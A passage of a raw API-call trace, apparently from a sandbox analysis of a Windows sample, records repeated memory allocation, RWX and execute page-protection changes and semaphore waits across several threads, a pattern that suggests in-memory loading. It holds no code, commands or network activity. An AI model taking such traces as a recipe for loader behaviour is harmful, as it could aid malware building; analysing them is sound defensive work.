(dwErrCode=0x0) [0328.701] GetNativeSystemInfo (in: lpSystemInfo=0x2dcf7e4 | out: lpSystemInfo=0x2dcf7e4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0328.701] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0328.701] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0328.702] GetProcessHeap () returned 0x530000 [0328.702] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83b60 [0328.702] VirtualAlloc (lpAddress=0x2eb0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2eb0000 [0328.703] VirtualAlloc (lpAddress=0x2eb1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2eb1000 [0328.706] VirtualAlloc (lpAddress=0x2ed4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2ed4000 [0328.706] VirtualAlloc (lpAddress=0x2ed5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2ed5000 [0328.707] VirtualAlloc (lpAddress=0x2ed6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2ed6000 [0328.707] GetLastError () returned 0x1e7 [0328.707] SetLastError (dwErrCode=0x1e7) [0328.707] GetLastError () returned 0x1e7 [0328.707] SetLastError (dwErrCode=0x1e7) [0328.707] GetLastError () returned 0x1e7 [0328.707] SetLastError (dwErrCode=0x1e7) [0328.707] GetLastError () returned 0x1e7 [0328.707] SetLastError (dwErrCode=0x1e7) [0328.708] VirtualProtect (in: lpAddress=0x2eb1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2dcf6bc | out: lpflOldProtect=0x2dcf6bc*=0x4) returned 1 [0328.717] GetLastError () returned 0x1e7 [0328.717] SetLastError (dwErrCode=0x1e7) [0328.717] GetLastError () returned 0x1e7 [0328.717] SetLastError (dwErrCode=0x1e7) [0328.717] GetLastError () returned 0x1e7 [0328.717] SetLastError (dwErrCode=0x1e7) [0328.717] VirtualProtect (in: lpAddress=0x2ed4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2dcf6bc | out: lpflOldProtect=0x2dcf6bc*=0x4) returned 1 [0328.718] GetLastError () returned 0x1e7 [0328.718] SetLastError (dwErrCode=0x1e7) [0328.718] GetLastError () returned 0x1e7 [0328.718] SetLastError (dwErrCode=0x1e7) [0328.718] GetLastError () returned 0x1e7 [0328.718] SetLastError (dwErrCode=0x1e7) [0328.718] VirtualProtect (in: lpAddress=0x2ed5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2dcf6bc | out: lpflOldProtect=0x2dcf6bc*=0x4) returned 1 [0328.719] GetLastError () returned 0x1e7 [0328.719] SetLastError (dwErrCode=0x1e7) [0328.719] GetLastError () returned 0x1e7 [0328.719] SetLastError (dwErrCode=0x1e7) [0328.719] GetLastError () returned 0x1e7 [0328.719] SetLastError (dwErrCode=0x1e7) [0328.719] VirtualFree (lpAddress=0x2ed6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0328.722] GetLastError () returned 0x1e7 [0328.722] SetLastError (dwErrCode=0x1e7) [0328.722] GetLastError () returned 0x1e7 [0328.722] SetLastError (dwErrCode=0x1e7) [0328.722] GetLastError () returned 0x1e7 [0328.722] SetLastError (dwErrCode=0x1e7) [0484.449] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0484.449] GetCurrentThreadId () returned 0xeec [0484.450] GetCurrentThreadId () returned 0xeec [0484.450] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0484.450] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0484.450] GetCurrentThreadId () returned 0xeec [0484.450] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0484.450] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0484.450] GetCurrentThreadId () returned 0xeec [0484.450] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0484.450] CloseHandle (hObject=0x640) returned 1 [0484.451] CloseHandle (hObject=0x630) returned 1 [0484.451] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0484.451] GetCurrentThreadId () returned 0xeec [0484.451] free (_Block=0x3a2db8) [0484.451] free (_Block=0x3a2dc8) [0484.451] GetCurrentThreadId () returned 0xeec [0484.452] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0484.452] malloc (_Size=0x5f5e100) returned 0x3230020 [0485.888] free (_Block=0x3230020) [0486.495] atoi (_Str="64") returned 64 [0486.495] atoi (_Str="8192") returned 8192 [0486.496] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2f80000 [0486.500] malloc (_Size=0x3afd) returned 0x20a27d0 [0486.500] malloc (_Size=0x3afd) returned 0x20a63d8 [0486.513] GetLastError () returned 0x0 [0486.513] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0486.514] GetCurrentThreadId () returned 0xeec [0486.514] GetCurrentThreadId () returned 0xeec [0486.514] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0486.514] GetCurrentThreadId () returned 0xeec [0486.514] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x630 [0486.514] GetCurrentProcess () returned 0xffffffff [0486.514] GetCurrentThread () returned 0xfffffffe [0486.514] GetCurrentProcess () returned 0xffffffff [0486.514] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adaac, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adaac*=0x640) returned 1 [0486.514] GetThreadPriority (hThread=0x640) returned 0 [0486.515] SetLastError (dwErrCode=0x0) [0486.515] GetLastError () returned 0x0 [0486.515] realloc (_Block=0x0, _Size=0x4) returned 0x3a2dc8 [0486.515] realloc (_Block=0x0, _Size=0x1) returned 0x3a2db8 [0486.515] SetLastError (dwErrCode=0x0) [0486.515] GetNativeSystemInfo (in: lpSystemInfo=0x2dcf948 | out: lpSystemInfo=0x2dcf948*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0486.515] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0486.515] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2fb0000 [0486.516] GetProcessHeap () returned 0x530000 [0486.516] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a838e0 [0486.516] VirtualAlloc (lpAddress=0x2fb0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2fb0000 [0486.516] VirtualAlloc (lpAddress=0x2fb1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2fb1000 [0486.519] VirtualAlloc (lpAddress=0x2fd4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2fd4000 [0486.520] VirtualAlloc (lpAddress=0x2fd5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2fd5000 [0486.520] VirtualAlloc (lpAddress=0x2fd6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2fd6000 [0486.521] GetLastError () returned 0x1e7 [0486.521] SetLastError (dwErrCode=0x1e7) [0486.521] GetLastError () returned 0x1e7 [0486.521] SetLastError (dwErrCode=0x1e7) [0486.521] GetLastError () returned 0x1e7 [0486.521] SetLastError (dwErrCode=0x1e7) [0486.521] GetLastError () returned 0x1e7 [0486.521] SetLastError (dwErrCode=0x1e7) [0486.521] VirtualProtect (in: lpAddress=0x2fb1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2dcf820 | out: lpflOldProtect=0x2dcf820*=0x4) returned 1 [0486.526] GetLastError () returned 0x1e7 [0486.526] SetLastError (dwErrCode=0x1e7) [0486.526] GetLastError () returned 0x1e7 [0486.526] SetLastError (dwErrCode=0x1e7) [0486.526] GetLastError () returned 0x1e7 [0486.526] SetLastError (dwErrCode=0x1e7) [0486.526] VirtualProtect (in: lpAddress=0x2fd4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2dcf820 | out: lpflOldProtect=0x2dcf820*=0x4) returned 1 [0486.526] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] VirtualProtect (in: lpAddress=0x2fd5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2dcf820 | out: lpflOldProtect=0x2dcf820*=0x4) returned 1 [0486.527] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] GetLastError () returned 0x1e7 [0486.527] SetLastError (dwErrCode=0x1e7) [0486.527] VirtualFree (lpAddress=0x2fd6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0486.532] GetLastError () returned 0x1e7 [0486.532] SetLastError (dwErrCode=0x1e7) [0486.532] GetLastError () returned 0x1e7 [0486.532] SetLastError (dwErrCode=0x1e7) [0486.532] GetLastError () returned 0x1e7 [0486.532] SetLastError (dwErrCode=0x1e7) Thread: id = 144 os_tid = 0xf4c [0417.448] malloc (_Size=0x5f5e100) returned 0x3230020 [0418.788] free (_Block=0x3230020) [0419.364] atoi (_Str="64") returned 64 [0419.364] atoi (_Str="8192") returned 8192 [0419.364] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2e10000 [0419.368] malloc (_Size=0x3afd) returned 0x209afc0 [0419.368] malloc (_Size=0x3afd) returned 0x209ebc8 [0419.382] GetLastError () returned 0x0 [0419.382] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0419.382] GetCurrentThreadId () returned 0xf4c [0419.382] calloc (_Count=0x1, _Size=0xc0) returned 0x3adb60 [0419.382] GetCurrentThreadId () returned 0xf4c [0419.382] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0419.382] GetCurrentThreadId () returned 0xf4c [0419.382] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628 [0419.383] GetCurrentProcess () returned 0xffffffff [0419.383] GetCurrentThread () returned 0xfffffffe [0419.383] GetCurrentProcess () returned 0xffffffff [0419.383] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adb74, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adb74*=0x674) returned 1 [0419.383] GetThreadPriority (hThread=0x674) returned 0 [0419.383] SetLastError (dwErrCode=0x0) [0419.383] GetLastError () returned 0x0 [0419.383] realloc (_Block=0x0, _Size=0x4) returned 0x3a2dd8 [0419.383] realloc (_Block=0x0, _Size=0x1) returned 0x3a2de8 [0419.383] SetLastError (dwErrCode=0x0) [0419.383] GetNativeSystemInfo (in: lpSystemInfo=0x322f804 | out: lpSystemInfo=0x322f804*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0419.383] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0419.383] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2f10000 [0419.384] GetProcessHeap () returned 0x530000 [0419.384] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83ba0 [0419.384] VirtualAlloc (lpAddress=0x2f10000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f10000 [0419.384] VirtualAlloc (lpAddress=0x2f11000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f11000 [0419.387] VirtualAlloc (lpAddress=0x2f34000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2f34000 [0419.388] VirtualAlloc (lpAddress=0x2f35000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f35000 [0419.388] VirtualAlloc (lpAddress=0x2f36000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f36000 [0419.389] GetLastError () returned 0x1e7 [0419.389] SetLastError (dwErrCode=0x1e7) [0419.389] GetLastError () returned 0x1e7 [0419.389] SetLastError (dwErrCode=0x1e7) [0419.389] GetLastError () returned 0x1e7 [0419.389] SetLastError (dwErrCode=0x1e7) [0419.389] GetLastError () returned 0x1e7 [0419.389] SetLastError (dwErrCode=0x1e7) [0419.389] VirtualProtect (in: lpAddress=0x2f11000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x322f6dc | out: lpflOldProtect=0x322f6dc*=0x4) returned 1 [0419.394] GetLastError () returned 0x1e7 [0419.394] SetLastError (dwErrCode=0x1e7) [0419.394] GetLastError () returned 0x1e7 [0419.394] SetLastError (dwErrCode=0x1e7) [0419.394] GetLastError () returned 0x1e7 [0419.394] SetLastError (dwErrCode=0x1e7) [0419.394] VirtualProtect (in: lpAddress=0x2f34000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x322f6dc | out: lpflOldProtect=0x322f6dc*=0x4) returned 1 [0419.394] GetLastError () returned 0x1e7 [0419.394] SetLastError (dwErrCode=0x1e7) [0419.395] GetLastError () returned 0x1e7 [0419.395] SetLastError (dwErrCode=0x1e7) [0419.395] GetLastError () returned 0x1e7 [0419.395] SetLastError (dwErrCode=0x1e7) [0419.395] VirtualProtect (in: lpAddress=0x2f35000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x322f6dc | out: lpflOldProtect=0x322f6dc*=0x4) returned 1 [0419.395] GetLastError () returned 0x1e7 [0419.395] SetLastError (dwErrCode=0x1e7) [0419.395] GetLastError () returned 0x1e7 [0419.395] SetLastError (dwErrCode=0x1e7) [0419.395] GetLastError () returned 0x1e7 [0419.395] SetLastError (dwErrCode=0x1e7) [0419.395] VirtualFree (lpAddress=0x2f36000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0419.399] GetLastError () returned 0x1e7 [0419.399] SetLastError (dwErrCode=0x1e7) [0419.399] GetLastError () returned 0x1e7 [0419.399] SetLastError (dwErrCode=0x1e7) [0419.399] GetLastError () returned 0x1e7 [0419.399] SetLastError (dwErrCode=0x1e7) [0574.632] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0574.632] GetCurrentThreadId () returned 0xf4c [0574.632] GetCurrentThreadId () returned 0xf4c [0574.632] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0574.632] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0574.632] GetCurrentThreadId () returned 0xf4c [0574.632] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0574.632] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0574.632] GetCurrentThreadId () returned 0xf4c [0574.632] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0574.633] CloseHandle (hObject=0x674) returned 1 [0574.634] CloseHandle (hObject=0x628) returned 1 [0574.634] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0574.634] GetCurrentThreadId () returned 0xf4c [0574.634] free (_Block=0x3a2dd8) [0574.634] free (_Block=0x3a2de8) [0574.634] GetCurrentThreadId () returned 0xf4c [0574.634] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0574.634] malloc (_Size=0x5f5e100) returned 0x3230020 [0575.885] free (_Block=0x3230020) [0576.426] atoi (_Str="64") returned 64 [0576.426] atoi (_Str="8192") returned 8192 [0576.426] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x3030000 [0576.430] malloc (_Size=0x3afd) returned 0x20b1d88 [0576.430] malloc (_Size=0x3afd) returned 0x20b5990 [0576.445] GetLastError () returned 0x0 [0576.445] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0576.446] GetCurrentThreadId () returned 0xf4c [0576.446] GetCurrentThreadId () returned 0xf4c [0576.446] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0576.446] GetCurrentThreadId () returned 0xf4c [0576.446] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628 [0576.446] GetCurrentProcess () returned 0xffffffff [0576.446] GetCurrentThread () returned 0xfffffffe [0576.446] GetCurrentProcess () returned 0xffffffff [0576.446] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adb74, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adb74*=0x674) returned 1 [0576.446] GetThreadPriority (hThread=0x674) returned 0 [0576.447] SetLastError (dwErrCode=0x0) [0576.447] GetLastError () returned 0x0 [0576.447] realloc (_Block=0x0, _Size=0x4) returned 0x3a2de8 [0576.447] realloc (_Block=0x0, _Size=0x1) returned 0x3a2dd8 [0576.447] SetLastError (dwErrCode=0x0) [0576.447] GetNativeSystemInfo (in: lpSystemInfo=0x322f968 | out: lpSystemInfo=0x322f968*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0576.447] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0576.448] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x30b0000 [0576.448] GetProcessHeap () returned 0x530000 [0576.448] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83ce0 [0576.448] VirtualAlloc (lpAddress=0x30b0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x30b0000 [0576.449] VirtualAlloc (lpAddress=0x30b1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x30b1000 [0576.452] VirtualAlloc (lpAddress=0x30d4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x30d4000 [0576.452] VirtualAlloc (lpAddress=0x30d5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x30d5000 [0576.453] VirtualAlloc (lpAddress=0x30d6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x30d6000 [0576.453] GetLastError () returned 0x1e7 [0576.454] SetLastError (dwErrCode=0x1e7) [0576.454] GetLastError () returned 0x1e7 [0576.454] SetLastError (dwErrCode=0x1e7) [0576.454] GetLastError () returned 0x1e7 [0576.454] SetLastError (dwErrCode=0x1e7) [0576.454] GetLastError () returned 0x1e7 [0576.454] SetLastError (dwErrCode=0x1e7) [0576.454] VirtualProtect (in: lpAddress=0x30b1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x322f840 | out: lpflOldProtect=0x322f840*=0x4) returned 1 [0576.486] GetLastError () returned 0x1e7 [0576.519] SetLastError (dwErrCode=0x1e7) [0576.519] GetLastError () returned 0x1e7 [0576.519] SetLastError (dwErrCode=0x1e7) [0576.519] GetLastError () returned 0x1e7 [0576.519] SetLastError (dwErrCode=0x1e7) [0576.519] VirtualProtect (in: lpAddress=0x30d4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x322f840 | out: lpflOldProtect=0x322f840*=0x4) returned 1 [0576.520] GetLastError () returned 0x1e7 [0576.520] SetLastError (dwErrCode=0x1e7) [0576.520] GetLastError () returned 0x1e7 [0576.520] SetLastError (dwErrCode=0x1e7) [0576.520] GetLastError () returned 0x1e7 [0576.520] SetLastError (dwErrCode=0x1e7) [0576.520] VirtualProtect (in: lpAddress=0x30d5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x322f840 | out: lpflOldProtect=0x322f840*=0x4) returned 1 [0576.520] GetLastError () returned 0x1e7 [0576.521] SetLastError (dwErrCode=0x1e7) [0576.521] GetLastError () returned 0x1e7 [0576.521] SetLastError (dwErrCode=0x1e7) [0576.521] GetLastError () returned 0x1e7 [0576.521] SetLastError (dwErrCode=0x1e7) [0576.521] VirtualFree (lpAddress=0x30d6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0576.524] GetLastError () returned 0x1e7 [0576.524] SetLastError (dwErrCode=0x1e7) [0576.524] GetLastError () returned 0x1e7 [0576.524] SetLastError (dwErrCode=0x1e7) [0576.524] GetLastError () returned 0x1e7 [0576.524] SetLastError (dwErrCode=0x1e7) Thread: id = 151 os_tid = 0xf88 [0507.488] malloc (_Size=0x5f5e100) returned 0x3230020 [0509.179] atoi (_Str="64") returned 64 [0509.179] atoi (_Str="8192") returned 8192 [0509.179] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2d70000 [0509.182] malloc (_Size=0x3afd) returned 0x20aa578 [0509.184] malloc (_Size=0x3afd) returned 0x20ae180 [0509.194] GetLastError () returned 0x0 [0509.194] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0509.194] GetCurrentThreadId () returned 0xf88 [0509.194] calloc (_Count=0x1, _Size=0xc0) returned 0x20ea560 [0509.194] GetCurrentThreadId () returned 0xf88 [0509.194] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0509.194] GetCurrentThreadId () returned 0xf88 [0509.194] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x660 [0509.194] GetCurrentProcess () returned 0xffffffff [0509.194] GetCurrentThread () returned 0xfffffffe [0509.194] GetCurrentProcess () returned 0xffffffff [0509.194] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x20ea574, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x20ea574*=0x664) returned 1 [0509.195] GetThreadPriority (hThread=0x664) returned 0 [0509.195] SetLastError (dwErrCode=0x0) [0509.195] GetLastError () returned 0x0 [0509.195] realloc (_Block=0x0, _Size=0x4) returned 0x3a2df8 [0509.195] realloc (_Block=0x0, _Size=0x1) returned 0x3a2e08 [0509.195] SetLastError (dwErrCode=0x0) [0509.195] GetNativeSystemInfo (in: lpSystemInfo=0x31df354 | out: lpSystemInfo=0x31df354*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0509.195] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0509.195] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2da0000 [0509.196] GetProcessHeap () returned 0x530000 [0509.196] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83c20 [0509.196] VirtualAlloc (lpAddress=0x2da0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2da0000 [0509.196] VirtualAlloc (lpAddress=0x2da1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2da1000 [0509.198] VirtualAlloc (lpAddress=0x2dc4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2dc4000 [0509.199] VirtualAlloc (lpAddress=0x2dc5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2dc5000 [0509.199] VirtualAlloc (lpAddress=0x2dc6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2dc6000 [0509.199] GetLastError () returned 0x1e7 [0509.200] SetLastError (dwErrCode=0x1e7) [0509.200] GetLastError () returned 0x1e7 [0509.200] SetLastError (dwErrCode=0x1e7) [0509.200] GetLastError () returned 0x1e7 [0509.200] SetLastError (dwErrCode=0x1e7) [0509.200] GetLastError () returned 0x1e7 [0509.200] SetLastError (dwErrCode=0x1e7) [0509.200] VirtualProtect (in: lpAddress=0x2da1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x31df22c | out: lpflOldProtect=0x31df22c*=0x4) returned 1 [0509.219] GetLastError () returned 0x1e7 [0509.219] SetLastError (dwErrCode=0x1e7) [0509.219] GetLastError () returned 0x1e7 [0509.219] SetLastError (dwErrCode=0x1e7) [0509.219] GetLastError () returned 0x1e7 [0509.219] SetLastError (dwErrCode=0x1e7) [0509.220] VirtualProtect (in: lpAddress=0x2dc4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x31df22c | out: lpflOldProtect=0x31df22c*=0x4) returned 1 [0509.220] GetLastError () returned 0x1e7 [0509.220] SetLastError (dwErrCode=0x1e7) [0509.220] GetLastError () returned 0x1e7 [0509.220] SetLastError (dwErrCode=0x1e7) [0509.220] GetLastError () returned 0x1e7 [0509.220] SetLastError (dwErrCode=0x1e7) [0509.220] VirtualProtect (in: lpAddress=0x2dc5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x31df22c | out: lpflOldProtect=0x31df22c*=0x4) returned 1 [0509.221] GetLastError () returned 0x1e7 [0509.221] SetLastError (dwErrCode=0x1e7) [0509.221] GetLastError () returned 0x1e7 [0509.221] SetLastError (dwErrCode=0x1e7) [0509.221] GetLastError () returned 0x1e7 [0509.221] SetLastError (dwErrCode=0x1e7) [0509.221] VirtualFree (lpAddress=0x2dc6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0509.225] GetLastError () returned 0x1e7 [0509.225] SetLastError (dwErrCode=0x1e7) [0509.225] GetLastError () returned 0x1e7 [0509.225] SetLastError (dwErrCode=0x1e7) [0509.225] GetLastError () returned 0x1e7 [0509.225] SetLastError (dwErrCode=0x1e7) [0665.408] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0665.408] GetCurrentThreadId () returned 0xf88 [0665.408] GetCurrentThreadId () returned 0xf88 [0665.408] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0665.408] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0665.409] GetCurrentThreadId () returned 0xf88 [0665.409] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0665.409] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0665.409] GetCurrentThreadId () returned 0xf88 [0665.409] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0665.409] 